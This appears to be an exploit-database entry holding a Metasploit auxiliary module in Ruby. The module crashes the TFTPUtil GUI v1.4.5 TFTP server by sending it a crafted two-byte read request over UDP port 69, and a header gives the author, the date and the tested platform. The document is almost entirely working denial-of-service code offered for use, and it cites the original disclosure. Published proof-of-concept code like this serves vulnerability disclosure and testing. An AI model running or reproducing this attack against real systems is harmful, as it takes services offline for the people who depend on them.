# Title: TFTPUtil GUI v1.4.5 Invalid Request DoS# CVE-ID: ()# OSVDB-ID: ()# Author: Vuk Ivanovic# Published: 2010-12-04# Verified: yes### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/###### TFTPGUI v1.4.5 Invalid Request DoS## Tested on: Windows XP, SP2 (EN)## Date tested: 11/27/2010### # Discovered by: Vuk Ivanovic(musashi42)# ##
require 'msf/core'class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,'Name' => 'TFTPGUI v1.4.5 Invalid Request DoS','Description'=> %q{
The TFTPUtil GUI server version 1.4.5 can be
DOSed by sending a specially crafted read request. Depending
of the setup, sending write request "\x00\x02" may also
work. Discovered by musashi42.},'Author' => 'musashi42','License'=> MSF_LICENSE,'Version'=> '$Revision: 2 $','References' =>
[['URL','http://www.exploit-db.com/exploits/12482'],['URL','https://www.securityfocus.com/bid/39872'],],'DisclosureDate' => 'December 04 2010'))
register_options([Opt::RPORT(69)])end
def run
connect_udp
print_status("Sending read request...")$stuff = "\00\x01"
udp_sock.put($stuff)
disconnect_udp
endend
